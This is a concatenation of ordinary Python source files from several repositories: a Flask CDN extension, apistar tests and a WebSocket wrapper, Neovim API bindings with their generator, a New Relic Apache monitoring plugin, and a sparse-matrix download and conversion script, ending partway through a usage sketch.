if app.config['CDN_TIMESTAMP']:
path = os.path.join(static_folder, values['filename'])
values['t'] = int(os.path.getmtime(path))
values['v'] = app.config['CDN_VERSION']
return urls.build(endpoint, values=values, force_external=True)
return flask_url_for(endpoint, **values)
class CDN(object):
"""
The CDN object allows your application to use Flask-CDN.
When initialising a CDN object you may optionally provide your
:class:`flask.Flask` application object if it is ready. Otherwise,
you may provide it later by using the :meth:`init_app` method.
:param app: optional :class:`flask.Flask` application object
:type app: :class:`flask.Flask` or None
"""
def __init__(self, app=None):
"""
An alternative way to pass your :class:`flask.Flask` application
object to Flask-CDN. :meth:`init_app` also takes care of some
default `settings`_.
:param app: the :class:`flask.Flask` application object.
"""
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
defaults = [('CDN_DEBUG', app.debug),
('CDN_DOMAIN', None),
('CDN_HTTPS', None),
('CDN_TIMESTAMP', True),
('CDN_VERSION', None),
('CDN_ENDPOINTS', ['static'])]
for k, v in defaults:
app.config.setdefault(k, v)
if app.config['CDN_DOMAIN']:
app.jinja_env.globals['url_for'] = url_for
```
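A minimal usage sketch for the extension above, assuming the module is importable and a placeholder CDN domain; once `CDN_DOMAIN` is set, `init_app` swaps `url_for` into the Jinja environment so static URLs point at the CDN.
```python
# Hypothetical sketch: wire the CDN extension above into a Flask app.
# 'cdn.example.com' and the static filename below are placeholders.
from flask import Flask

app = Flask(__name__)
app.config['CDN_DOMAIN'] = 'cdn.example.com'
CDN(app)

# In a template, url_for('static', filename='css/site.css') would now build
# something like http://cdn.example.com/static/css/site.css?t=<file mtime>,
# because CDN_TIMESTAMP defaults to True.
```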
|
{
"source": "jeffbuttars/apistar-autoapp",
"score": 3
}
|
#### File: apistar-autoapp/tests/test_list_apps.py
```python
import os
from apistar_autoapp.autoapp import list_apps
cur_dir = os.path.realpath(os.path.dirname(__file__))
def test_list_apps_top():
res = list_apps(cur_dir)
assert res
assert set(res) == set(('v1', 'v2'))
def test_list_apps_v1():
res = list_apps(os.path.join(cur_dir, 'v1'))
assert res
assert set(res) == set(('epone', 'eptwo', 'epthree', 'deep'))
def test_list_apps_v2():
res = list_apps(os.path.join(cur_dir, 'v2'))
assert res
assert set(res) == set(('epone', 'eptwo', 'epthree'))
def test_list_apps_v1_deep():
res = list_apps(os.path.join(cur_dir, 'v1', 'deep'))
assert res
assert set(res) == set(('one', 'two'))
```
|
{
"source": "jeffbuttars/apistar-websocket",
"score": 2
}
|
#### File: apistar-websocket/apistar_websocket/websocket.py
```python
import logging
import typing
from enum import Enum
import websockets
from apistar import App
from apistar.exceptions import HTTPException
from apistar.http import Response
from apistar.server.asgi import ASGIReceive, ASGIScope, ASGISend
from apistar.server.components import Component
logger = logging.getLogger(__name__)
class Status(Enum):
# 1000 indicates a normal closure, meaning that the purpose for
# which the connection was established has been fulfilled.
OK = 1000
# 1001 indicates that an endpoint is "going away", such as a server
# going down or a browser having navigated away from a page.
LEAVING = 1001
# 1002 indicates that an endpoint is terminating the connection due
# to a protocol error.
PROT_ERROR = 1002
# 1003 indicates that an endpoint is terminating the connection
# because it has received a type of data it cannot accept (e.g., an
# endpoint that understands only text data MAY send this if it
# receives a binary message).
UNSUPPORTED_TYPE = 1003
# Reserved. The specific meaning might be defined in the future.
RESERVED_1004 = 1004
# 1005 is a reserved value and MUST NOT be set as a status code in a
# Close control frame by an endpoint. It is designated for use in
# applications expecting a status code to indicate that no status
# code was actually present.
NO_STATUS = 1005
# 1006 is a reserved value and MUST NOT be set as a status code in a
# Close control frame by an endpoint. It is designated for use in
# applications expecting a status code to indicate that the
# connection was closed abnormally, e.g., without sending or
# receiving a Close control frame.
CLOSED_ABNORMAL = 1006
# 1007 indicates that an endpoint is terminating the connection
# because it has received data within a message that was not
# consistent with the type of the message (e.g., non-UTF-8 [RFC3629]
# data within a text message).
    INVALID_DATA = 1007
# 1008 indicates that an endpoint is terminating the connection
# because it has received a message that violates its policy. This
# is a generic status code that can be returned when there is no
# other more suitable status code (e.g., 1003 or 1009) or if there
# is a need to hide specific details about the policy.
POLICY_VIOLATION = 1008
# 1009 indicates that an endpoint is terminating the connection
# because it has received a message that is too big for it to
# process.
TOO_BIG = 1009
# 1010 indicates that an endpoint (client) is terminating the
# connection because it has expected the server to negotiate one or
# more extension, but the server didn't return them in the response
# message of the WebSocket handshake. The list of extensions that
TLS_FAIL = 1010
class WebSocketClosed(HTTPException):
def __init__(self,
detail: str = 'WebSocket has closed',
status_code: int = Status.OK.value) -> None:
super().__init__(detail, 200)
# def get_headers(self):
# return {
# }
class WebSocketProtocolError(HTTPException):
def __init__(self,
detail: str = 'WebSocket protocol error',
status_code: int = Status.PROT_ERROR.value) -> None:
super().__init__(detail, status_code)
class WebSocket(object):
"""
Basic WebSocket wrapper for APIStar, though this one is specific to Uvicorn.
This only works with ASGI and on a standalone route the manages connecting and closing
the WebSocket. The WebSocketAutoHook can connect/close the connection before and after
the handler but ASyncApp::asgi_finalize must be able to handle the websocket type
correctly and not try to send an HTTP response.
Something like this in ASyncApp::asgi_finalize can allow for cleaner WebSocket usage.
# Process exceptions
if scope.get('type') == 'websocket':
return
# Process HTTP Response
"""
def __init__(self,
asgi_scope: dict,
asgi_send: typing.Callable,
asgi_receive: typing.Callable,
) -> None:
self.scope = asgi_scope
self.asgi_send = asgi_send
self.asgi_receive = asgi_receive
# UVicorn specific, get the WebSocketRequest instance
# This will blow up under the debug server, so we'll fake it, I guess?
try:
self._ws_request = asgi_send.__self__
except AttributeError as e:
logger.error("Unable to get a reference to underlying Uvicorn websocket instance")
self._ws_request = None
@property
def state(self):
if hasattr(self._ws_request, 'state'):
return self._ws_request.state
return self._ws_request.protocol.state
@property
def is_open(self):
return self.state is websockets.protocol.State.OPEN
async def send(self, data=None, **kwargs):
msg = {
'type': 'websocket.send',
}
msg.update(kwargs)
if data:
if isinstance(data, str):
msg['text'] = data
elif isinstance(data, bytes):
msg['bytes'] = data
return await self.asgi_send(msg)
async def receive(self):
msg = await self.asgi_receive()
return msg.get('text', msg.get('bytes'))
async def connect(self):
# Try to accept and upgrade the websocket
msg = await self.asgi_receive()
if msg['type'] != 'websocket.connect':
raise WebSocketProtocolError(
'Expected websocket connection but got: %s' % msg['type'])
await self.asgi_send({'type': 'websocket.accept'})
async def close(self, code: int = Status.OK.value, data=None):
message = {
'type': 'websocket.disconnect',
'code': code,
}
if data:
if isinstance(data, str):
message['text'] = data
elif isinstance(data, bytes):
message['bytes'] = data
await self.asgi_send(message)
class WebSocketAutoHook():
"""
Automatically connect the websocket on request.
Automatically close the websocket after it's handled
NOTE: This hook only works if AsyncApp::asgi_finalize supports the webhook type
and doesn't send HTTP Response data when a WebSocket is finished.
"""
async def on_request(self, ws: WebSocket):
if ws.scope.get('type') == 'websocket':
await ws.connect()
async def on_response(self, ws: WebSocket, response: Response, scope: ASGIScope):
if ws.scope.get('type') == 'websocket':
if ws.is_open:
scope['raise_exceptions'] = True
await ws.close(data=response.content if response else None)
# Go for the inner exception by always raising for websocket
raise WebSocketClosed()
async def on_error(self, ws: WebSocket, response: Response):
if ws.scope.get('type') == 'websocket':
if ws.is_open:
await ws.close(data=response.content if response else None)
raise WebSocketClosed()
class WebSocketComponent(Component):
def resolve(self,
scope: ASGIScope,
send: ASGISend,
receive: ASGIReceive) -> WebSocket:
return WebSocket(scope, send, receive)
```
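A hedged sketch of the standalone-route pattern described in the WebSocket docstring above: the handler receives the component, accepts the upgrade itself, and closes the connection when done. The route path, handler name and echo behaviour are illustrative.
```python
# Hypothetical sketch of a standalone WebSocket route using the component above.
from apistar import ASyncApp, Route

async def echo(ws: WebSocket):
    await ws.connect()                      # accept the websocket upgrade
    message = await ws.receive()            # read one text/bytes frame
    await ws.send('echo: %s' % message)     # send it back
    await ws.close()                        # normal closure (code 1000)

routes = [Route('/echo', method='GET', handler=echo)]
app = ASyncApp(routes=routes, components=[WebSocketComponent()])
```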
|
{
"source": "jeffbuttars/jb-nvim",
"score": 2
}
|
#### File: jb-nvim/client/apigen.py
```python
import builtins
import subprocess
import tempfile
import keyword
import msgpack
from pprint import pformat as pf
def convert(x):
if isinstance(x, bytes):
return x.decode('utf-8')
return x
def kword(kw):
if kw in keyword.kwlist or kw in dir(builtins):
return 'v_' + kw
return kw
def print_func(func):
fmt = (
" # Function: {name}\n"
" # Parameters {parameters}\n"
" # Returns {return_type}\n"
" # Recieves channel id {receives_channel_id}\n"
" # Can fail {can_fail}\n"
" def {func_name}(self, {args}):\n"
" return self.send_sync(ReqMsg('{name}', *[{args}]))\n"
)
func['receives_channel_id'] = func.get('receives_channel_id', False)
func['can_fail'] = func.get('can_fail', False)
func['args'] = ', '.join([kword(x[1]) for x in func.get('parameters', [])])
func['parameters'] = ', '.join(
[x[0] + ': ' + x[1] for x in func.get('parameters', [])])
print(fmt.format(**func))
def print_cls(cls, funcs):
fmt = (
"\nclass {}(Cmd):\n\n"
" def __init__(self, session):\n"
" self._session = session\n"
)
print(fmt.format(cls))
for func in funcs:
print_func(func)
def parse_funcs(funcs):
cls_map = {}
for func in funcs:
fn = func['name']
cls, name = fn.split('_', 1)
cls = cls.title()
func['func_name'] = name
if cls not in cls_map:
cls_map[cls] = []
cls_map[cls].append(func)
for k, v in cls_map.items():
print_cls(k, v)
print("function_classes = {")
for k in cls_map:
print(" '{}': {},".format(k.lower(), k))
print("}\n")
def main():
try:
fd = tempfile.TemporaryFile()
with subprocess.Popen(['nvim', '--api-info'], stdout=subprocess.PIPE) as proc:
fd.write(proc.stdout.read())
except subprocess.CalledProcessError:
print("Error running nvim --api-info")
raise
fd.seek(0)
func_info = msgpack.unpackb(
fd.read(), encoding='utf-8',
object_hook=lambda obj: {convert(k): convert(v) for k, v in obj.items()},
list_hook=lambda item: [convert(x) for x in item],
)
# print("api_info =", pf(func_info))
print("from msg import ReqMsg")
print("from cmds import Cmd\n")
parse_funcs(func_info['functions'])
if __name__ == '__main__':
main()
```
#### File: jb-nvim/client/nvim_funcs.py
```python
from msg import ReqMsg
from cmds import Cmd
class Window(Cmd):
def __init__(self, session):
self._session = session
# Function: window_get_buffer
# Parameters Window: window
# Returns Buffer
# Recieves channel id False
# Can fail True
def get_buffer(self, window):
return self.send_sync(ReqMsg('window_get_buffer', *[window]))
# Function: window_get_cursor
# Parameters Window: window
# Returns ArrayOf(Integer, 2)
# Recieves channel id False
# Can fail True
def get_cursor(self, window):
return self.send_sync(ReqMsg('window_get_cursor', *[window]))
# Function: window_set_cursor
# Parameters Window: window, ArrayOf(Integer, 2): pos
# Returns void
# Recieves channel id False
# Can fail True
def set_cursor(self, window, pos):
return self.send_sync(ReqMsg('window_set_cursor', *[window, pos]))
# Function: window_get_height
# Parameters Window: window
# Returns Integer
# Recieves channel id False
# Can fail True
def get_height(self, window):
return self.send_sync(ReqMsg('window_get_height', *[window]))
# Function: window_set_height
# Parameters Window: window, Integer: height
# Returns void
# Recieves channel id False
# Can fail True
def set_height(self, window, height):
return self.send_sync(ReqMsg('window_set_height', *[window, height]))
# Function: window_get_width
# Parameters Window: window
# Returns Integer
# Recieves channel id False
# Can fail True
def get_width(self, window):
return self.send_sync(ReqMsg('window_get_width', *[window]))
# Function: window_set_width
# Parameters Window: window, Integer: width
# Returns void
# Recieves channel id False
# Can fail True
def set_width(self, window, width):
return self.send_sync(ReqMsg('window_set_width', *[window, width]))
# Function: window_get_var
# Parameters Window: window, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, window, name):
return self.send_sync(ReqMsg('window_get_var', *[window, name]))
# Function: window_set_var
# Parameters Window: window, String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, window, name, value):
return self.send_sync(ReqMsg('window_set_var', *[window, name, value]))
# Function: window_get_option
# Parameters Window: window, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_option(self, window, name):
return self.send_sync(ReqMsg('window_get_option', *[window, name]))
# Function: window_set_option
# Parameters Window: window, String: name, Object: value
# Returns void
# Recieves channel id False
# Can fail True
def set_option(self, window, name, value):
return self.send_sync(ReqMsg('window_set_option', *[window, name, value]))
# Function: window_get_position
# Parameters Window: window
# Returns ArrayOf(Integer, 2)
# Recieves channel id False
# Can fail True
def get_position(self, window):
return self.send_sync(ReqMsg('window_get_position', *[window]))
# Function: window_get_tabpage
# Parameters Window: window
# Returns Tabpage
# Recieves channel id False
# Can fail True
def get_tabpage(self, window):
return self.send_sync(ReqMsg('window_get_tabpage', *[window]))
# Function: window_is_valid
# Parameters Window: window
# Returns Boolean
# Recieves channel id False
# Can fail False
def is_valid(self, window):
return self.send_sync(ReqMsg('window_is_valid', *[window]))
class Buffer(Cmd):
def __init__(self, session):
self._session = session
# Function: buffer_line_count
# Parameters Buffer: buffer
# Returns Integer
# Recieves channel id False
# Can fail True
def line_count(self, buffer):
return self.send_sync(ReqMsg('buffer_line_count', *[buffer]))
# Function: buffer_get_line
# Parameters Buffer: buffer, Integer: index
# Returns String
# Recieves channel id False
# Can fail True
def get_line(self, buffer, index):
return self.send_sync(ReqMsg('buffer_get_line', *[buffer, index]))
# Function: buffer_set_line
# Parameters Buffer: buffer, Integer: index, String: line
# Returns void
# Recieves channel id False
# Can fail True
def set_line(self, buffer, index, line):
return self.send_sync(ReqMsg('buffer_set_line', *[buffer, index, line]))
# Function: buffer_del_line
# Parameters Buffer: buffer, Integer: index
# Returns void
# Recieves channel id False
# Can fail True
def del_line(self, buffer, index):
return self.send_sync(ReqMsg('buffer_del_line', *[buffer, index]))
# Function: buffer_get_line_slice
# Parameters Buffer: buffer, Integer: start, Integer: end, Boolean: include_start, Boolean: include_end
# Returns ArrayOf(String)
# Recieves channel id False
# Can fail True
def get_line_slice(self, buffer, start, end, include_start, include_end):
return self.send_sync(ReqMsg('buffer_get_line_slice', *[buffer, start, end, include_start, include_end]))
# Function: buffer_set_line_slice
# Parameters Buffer: buffer, Integer: start, Integer: end, Boolean: include_start, Boolean: include_end, ArrayOf(String): replacement
# Returns void
# Recieves channel id False
# Can fail True
def set_line_slice(self, buffer, start, end, include_start, include_end, replacement):
return self.send_sync(ReqMsg('buffer_set_line_slice', *[buffer, start, end, include_start, include_end, replacement]))
# Function: buffer_get_var
# Parameters Buffer: buffer, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, buffer, name):
return self.send_sync(ReqMsg('buffer_get_var', *[buffer, name]))
# Function: buffer_set_var
# Parameters Buffer: buffer, String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, buffer, name, value):
return self.send_sync(ReqMsg('buffer_set_var', *[buffer, name, value]))
# Function: buffer_get_option
# Parameters Buffer: buffer, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_option(self, buffer, name):
return self.send_sync(ReqMsg('buffer_get_option', *[buffer, name]))
# Function: buffer_set_option
# Parameters Buffer: buffer, String: name, Object: value
# Returns void
# Recieves channel id False
# Can fail True
def set_option(self, buffer, name, value):
return self.send_sync(ReqMsg('buffer_set_option', *[buffer, name, value]))
# Function: buffer_get_number
# Parameters Buffer: buffer
# Returns Integer
# Recieves channel id False
# Can fail True
def get_number(self, buffer):
return self.send_sync(ReqMsg('buffer_get_number', *[buffer]))
# Function: buffer_get_name
# Parameters Buffer: buffer
# Returns String
# Recieves channel id False
# Can fail True
def get_name(self, buffer):
return self.send_sync(ReqMsg('buffer_get_name', *[buffer]))
# Function: buffer_set_name
# Parameters Buffer: buffer, String: name
# Returns void
# Recieves channel id False
# Can fail True
def set_name(self, buffer, name):
return self.send_sync(ReqMsg('buffer_set_name', *[buffer, name]))
# Function: buffer_is_valid
# Parameters Buffer: buffer
# Returns Boolean
# Recieves channel id False
# Can fail False
def is_valid(self, buffer):
return self.send_sync(ReqMsg('buffer_is_valid', *[buffer]))
# Function: buffer_insert
# Parameters Buffer: buffer, Integer: lnum, ArrayOf(String): lines
# Returns void
# Recieves channel id False
# Can fail True
def insert(self, buffer, lnum, lines):
return self.send_sync(ReqMsg('buffer_insert', *[buffer, lnum, lines]))
# Function: buffer_get_mark
# Parameters Buffer: buffer, String: name
# Returns ArrayOf(Integer, 2)
# Recieves channel id False
# Can fail True
def get_mark(self, buffer, name):
return self.send_sync(ReqMsg('buffer_get_mark', *[buffer, name]))
class Tabpage(Cmd):
def __init__(self, session):
self._session = session
# Function: tabpage_get_windows
# Parameters Tabpage: tabpage
# Returns ArrayOf(Window)
# Recieves channel id False
# Can fail True
def get_windows(self, tabpage):
return self.send_sync(ReqMsg('tabpage_get_windows', *[tabpage]))
# Function: tabpage_get_var
# Parameters Tabpage: tabpage, String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, tabpage, name):
return self.send_sync(ReqMsg('tabpage_get_var', *[tabpage, name]))
# Function: tabpage_set_var
# Parameters Tabpage: tabpage, String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, tabpage, name, value):
return self.send_sync(ReqMsg('tabpage_set_var', *[tabpage, name, value]))
# Function: tabpage_get_window
# Parameters Tabpage: tabpage
# Returns Window
# Recieves channel id False
# Can fail True
def get_window(self, tabpage):
return self.send_sync(ReqMsg('tabpage_get_window', *[tabpage]))
# Function: tabpage_is_valid
# Parameters Tabpage: tabpage
# Returns Boolean
# Recieves channel id False
# Can fail False
def is_valid(self, tabpage):
return self.send_sync(ReqMsg('tabpage_is_valid', *[tabpage]))
class Vim(Cmd):
def __init__(self, session):
self._session = session
# Function: vim_push_keys
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def push_keys(self, v_str):
return self.send_sync(ReqMsg('vim_push_keys', *[v_str]))
# Function: vim_command
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail True
def command(self, v_str):
return self.send_sync(ReqMsg('vim_command', *[v_str]))
# Function: vim_feedkeys
# Parameters String: keys, String: mode
# Returns void
# Recieves channel id False
# Can fail False
def feedkeys(self, keys, mode):
return self.send_sync(ReqMsg('vim_feedkeys', *[keys, mode]))
# Function: vim_replace_termcodes
# Parameters String: str, Boolean: from_part, Boolean: do_lt, Boolean: special
# Returns String
# Recieves channel id False
# Can fail False
def replace_termcodes(self, v_str, from_part, do_lt, special):
return self.send_sync(ReqMsg('vim_replace_termcodes', *[v_str, from_part, do_lt, special]))
# Function: vim_eval
# Parameters String: str
# Returns Object
# Recieves channel id False
# Can fail True
def eval(self, v_str):
return self.send_sync(ReqMsg('vim_eval', *[v_str]))
# Function: vim_strwidth
# Parameters String: str
# Returns Integer
# Recieves channel id False
# Can fail True
def strwidth(self, v_str):
return self.send_sync(ReqMsg('vim_strwidth', *[v_str]))
# Function: vim_list_runtime_paths
# Parameters
# Returns ArrayOf(String)
# Recieves channel id False
# Can fail False
def list_runtime_paths(self, ):
return self.send_sync(ReqMsg('vim_list_runtime_paths', *[]))
# Function: vim_change_directory
# Parameters String: dir
# Returns void
# Recieves channel id False
# Can fail True
def change_directory(self, v_dir):
return self.send_sync(ReqMsg('vim_change_directory', *[v_dir]))
# Function: vim_get_current_line
# Parameters
# Returns String
# Recieves channel id False
# Can fail True
def get_current_line(self, ):
return self.send_sync(ReqMsg('vim_get_current_line', *[]))
# Function: vim_set_current_line
# Parameters String: line
# Returns void
# Recieves channel id False
# Can fail True
def set_current_line(self, line):
return self.send_sync(ReqMsg('vim_set_current_line', *[line]))
# Function: vim_del_current_line
# Parameters
# Returns void
# Recieves channel id False
# Can fail True
def del_current_line(self, ):
return self.send_sync(ReqMsg('vim_del_current_line', *[]))
# Function: vim_get_var
# Parameters String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_var(self, name):
return self.send_sync(ReqMsg('vim_get_var', *[name]))
# Function: vim_set_var
# Parameters String: name, Object: value
# Returns Object
# Recieves channel id False
# Can fail True
def set_var(self, name, value):
return self.send_sync(ReqMsg('vim_set_var', *[name, value]))
# Function: vim_get_vvar
# Parameters String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_vvar(self, name):
return self.send_sync(ReqMsg('vim_get_vvar', *[name]))
# Function: vim_get_option
# Parameters String: name
# Returns Object
# Recieves channel id False
# Can fail True
def get_option(self, name):
return self.send_sync(ReqMsg('vim_get_option', *[name]))
# Function: vim_set_option
# Parameters String: name, Object: value
# Returns void
# Recieves channel id False
# Can fail True
def set_option(self, name, value):
return self.send_sync(ReqMsg('vim_set_option', *[name, value]))
# Function: vim_out_write
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def out_write(self, v_str):
return self.send_sync(ReqMsg('vim_out_write', *[v_str]))
# Function: vim_err_write
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def err_write(self, v_str):
return self.send_sync(ReqMsg('vim_err_write', *[v_str]))
# Function: vim_report_error
# Parameters String: str
# Returns void
# Recieves channel id False
# Can fail False
def report_error(self, v_str):
return self.send_sync(ReqMsg('vim_report_error', *[v_str]))
# Function: vim_get_buffers
# Parameters
# Returns ArrayOf(Buffer)
# Recieves channel id False
# Can fail False
def get_buffers(self, ):
return self.send_sync(ReqMsg('vim_get_buffers', *[]))
# Function: vim_get_current_buffer
# Parameters
# Returns Buffer
# Recieves channel id False
# Can fail False
def get_current_buffer(self, ):
return self.send_sync(ReqMsg('vim_get_current_buffer', *[]))
# Function: vim_set_current_buffer
# Parameters Buffer: buffer
# Returns void
# Recieves channel id False
# Can fail True
def set_current_buffer(self, buffer):
return self.send_sync(ReqMsg('vim_set_current_buffer', *[buffer]))
# Function: vim_get_windows
# Parameters
# Returns ArrayOf(Window)
# Recieves channel id False
# Can fail False
def get_windows(self, ):
return self.send_sync(ReqMsg('vim_get_windows', *[]))
# Function: vim_get_current_window
# Parameters
# Returns Window
# Recieves channel id False
# Can fail False
def get_current_window(self, ):
return self.send_sync(ReqMsg('vim_get_current_window', *[]))
# Function: vim_set_current_window
# Parameters Window: window
# Returns void
# Recieves channel id False
# Can fail True
def set_current_window(self, window):
return self.send_sync(ReqMsg('vim_set_current_window', *[window]))
# Function: vim_get_tabpages
# Parameters
# Returns ArrayOf(Tabpage)
# Recieves channel id False
# Can fail False
def get_tabpages(self, ):
return self.send_sync(ReqMsg('vim_get_tabpages', *[]))
# Function: vim_get_current_tabpage
# Parameters
# Returns Tabpage
# Recieves channel id False
# Can fail False
def get_current_tabpage(self, ):
return self.send_sync(ReqMsg('vim_get_current_tabpage', *[]))
# Function: vim_set_current_tabpage
# Parameters Tabpage: tabpage
# Returns void
# Recieves channel id False
# Can fail True
def set_current_tabpage(self, tabpage):
return self.send_sync(ReqMsg('vim_set_current_tabpage', *[tabpage]))
# Function: vim_subscribe
# Parameters String: event
# Returns void
# Recieves channel id True
# Can fail False
def subscribe(self, event):
return self.send_sync(ReqMsg('vim_subscribe', *[event]))
# Function: vim_unsubscribe
# Parameters String: event
# Returns void
# Recieves channel id True
# Can fail False
def unsubscribe(self, event):
return self.send_sync(ReqMsg('vim_unsubscribe', *[event]))
# Function: vim_register_provider
# Parameters String: feature
# Returns void
# Recieves channel id True
# Can fail True
def register_provider(self, feature):
return self.send_sync(ReqMsg('vim_register_provider', *[feature]))
# Function: vim_get_api_info
# Parameters
# Returns Array
# Recieves channel id True
# Can fail False
def get_api_info(self, ):
return self.send_sync(ReqMsg('vim_get_api_info', *[]))
function_classes = {
'window': Window,
'buffer': Buffer,
'tabpage': Tabpage,
'vim': Vim,
}
```
|
{
"source": "jeffbuttars/pcm",
"score": 2
}
|
#### File: pcm/pcmpy/pcm.py
```python
import logging
# Set up the logger
logger = logging.getLogger('pcm')
# Use a console handler, set it to debug by default
logger_ch = logging.StreamHandler()
logger.setLevel(logging.INFO)
log_formatter = logging.Formatter(
('%(levelname)s: %(asctime)s %(processName)s:%(process)d'
' %(filename)s:%(lineno)s %(module)s::%(funcName)s()'
' -- %(message)s'))
logger_ch.setFormatter(log_formatter)
logger.addHandler(logger_ch)
import sys
import os
if __name__ == '__main__':
this_dir = os.path.realpath(os.path.dirname(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(this_dir, "../")))
import argparse
from pcm import cmds
parser = argparse.ArgumentParser(
"pcm",
description=("Pacman Command Master")
)
parser.add_argument('-d',
'--debug',
default=False, action='store_true',
help=("Enable debug output and debug run mode")
)
# parser.add_argument('-c',
# '--config',
# default=None,
# help=("Specify a config file location.")
# )
def main():
sub_parser = parser.add_subparsers(help=("pcm commands"))
cmds.build_cmds(sub_parser)
args = parser.parse_args()
if args.debug:
logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.debug("args: %s", args)
# import conf
# conf.load_settings(args.config)
# logger.debug("settings: %s", conf.settings)
if hasattr(args, 'func'):
return args.func(args)
parser.print_help()
# main()
if __name__ == '__main__':
main()
```
|
{
"source": "jeffbyrnes/newrelic-plugin-agent",
"score": 2
}
|
#### File: newrelic_plugin_agent/plugins/apache_httpd.py
```python
import logging
import re
from newrelic_plugin_agent.plugins import base
LOGGER = logging.getLogger(__name__)
PATTERN = re.compile(r'^([\w\s{1}]+):\s([\d\.{1}]+)', re.M)
class ApacheHTTPD(base.HTTPStatsPlugin):
DEFAULT_QUERY = 'auto'
GUID = 'com.meetme.newrelic_apache_httpd_agent'
KEYS = {'Total Accesses': {'type': '',
'label': 'Totals/Requests'},
'BusyWorkers': {'type': 'gauge',
'label': 'Workers/Busy'},
'Total kBytes': {'type': '',
'label': 'Totals/Bytes Sent',
'suffix': 'kb'},
'BytesPerSec': {'type': 'gauge',
'label': 'Bytes/Per Second',
'suffix': 'bytes/sec'},
'BytesPerReq': {'type': 'gauge',
'label': 'Requests/Average Payload Size',
'suffix': 'bytes'},
'IdleWorkers': {'type': 'gauge', 'label': 'Workers/Idle'},
'CPULoad': {'type': 'gauge', 'label': 'CPU Load'},
'ReqPerSec': {'type': 'gauge', 'label': 'Requests/Velocity',
'suffix': 'requests/sec'},
'Uptime': {'type': 'gauge', 'label': 'Uptime', 'suffix': 'sec'}}
def error_message(self):
        LOGGER.error('Could not match any of the stats, please ensure '
'Apache HTTPd is configured correctly. If you report '
'this as a bug, please include the full output of the '
'status page from %s in your ticket', self.stats_url)
def add_datapoints(self, stats):
"""Add all of the data points for a node
:param str stats: The stats content from Apache as a string
"""
matches = PATTERN.findall(stats or '')
for key, value in matches:
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
value = 0
if key in self.KEYS:
if self.KEYS[key].get('type') == 'gauge':
self.add_gauge_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
self.add_derive_value(self.KEYS[key]['label'],
self.KEYS[key].get('suffix', ''),
value)
else:
LOGGER.warning('Found unmapped key/value pair: %s = %s',
key, value)
```
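To make the parsing concrete, here is a hedged sketch of running PATTERN over mod_status `?auto`-style output; the sample text is fabricated for illustration, not captured from a real server.
```python
# Hypothetical sample of Apache mod_status '?auto' output and how PATTERN splits it.
sample = (
    "Total Accesses: 12345\n"
    "Total kBytes: 67890\n"
    "CPULoad: .0312\n"
    "Uptime: 86400\n"
    "ReqPerSec: .142\n"
    "BytesPerSec: 804.3\n"
    "BytesPerReq: 5632\n"
    "BusyWorkers: 3\n"
    "IdleWorkers: 47\n"
)
print(PATTERN.findall(sample))
# [('Total Accesses', '12345'), ('Total kBytes', '67890'), ('CPULoad', '.0312'), ...]
```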
|
{
"source": "jeffc71/rank_structured_cholesky",
"score": 2
}
|
#### File: work/matrices/runnerv0.py
```python
import os
import sys
import numpy as np
import scipy.io as sio
import gzip
# BUILD_PATH="../../../../rsc-build"
BUILD_PATH="/Users/dbindel/local/rsc/bin"
def mat_to_bcsm(basename, write_rhs=True):
"""Write UF sparse collection .mat file to internal format.
NB: We probably ought to just hook up a Python front-end to the solver.
"""
m = sio.loadmat('{0}.mat'.format(basename))
problem = m['Problem']
A = problem['A'][0,0]
# nnz, m, n are uint64; offsets/indices are int32; data is double
with gzip.open('{0}_system.bcsm.gz'.format(basename), 'wb') as f:
hdr = np.array([A.nnz, A.shape[0], A.shape[1]], dtype=np.uint64)
f.write(hdr.tostring())
f.write(A.indptr.tostring())
f.write(A.indices.tostring())
f.write(A.data.tostring())
if write_rhs:
if 'b' in problem:
b = problem['b'][0,0][:,0]
else:
b = np.ones((A.shape[0],))
with open('{0}_rhs.vector'.format(basename), 'wb') as f:
hdr = np.array([A.shape[0]], dtype=np.int32)
f.write(hdr)
f.write(b)
def download(collection, basename):
baseURL = 'http://www.cise.ufl.edu/research/sparse/mat/'
matname = '{0}.mat'.format(basename)
if not os.path.exists(matname):
assert collection is not None, "Invalid collection for download"
os.system('wget {0}/{1}/{2}.mat'.format(baseURL, collection, basename))
def setup(collection, basename):
download(collection, basename)
if not os.path.exists('{0}_system.bcsm.gz'.format(basename)):
mat_to_bcsm(basename)
def run(collection, basename):
setup(collection, basename)
rundir = '{0}_run'.format(basename)
if not os.path.exists(rundir):
os.mkdir(rundir)
os.chdir(rundir)
os.system('{0}/pcg_solver ../{1}'.format(BUILD_PATH, basename))
if __name__ == "__main__":
cmds = {'run': run, 'download': download, 'setup': setup}
if len(sys.argv) == 3:
cmd, name = sys.argv[1:]
name_parts = name.split('/')
assert len(name_parts) <= 2, 'Invalid name'
if len(name_parts) == 2:
collection = name_parts[0]
basename = name_parts[1]
else:
collection = None
basename = name_parts[0]
cmds[cmd](collection, basename)
else:
print("Format: translate.py command matname")
```
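A hedged companion sketch to mat_to_bcsm above: it reads a `*_system.bcsm.gz` file back into a SciPy sparse matrix, assuming the layout the writer produces (uint64 header `[nnz, m, n]`, then int32 indptr and indices, then float64 data) and the column-compressed (CSC) arrays that scipy.io.loadmat yields for sparse matrices. The function name is made up.
```python
# Hypothetical reader for the bcsm format written above.
import gzip
import numpy as np
from scipy.sparse import csc_matrix

def read_bcsm(path):
    with gzip.open(path, 'rb') as f:
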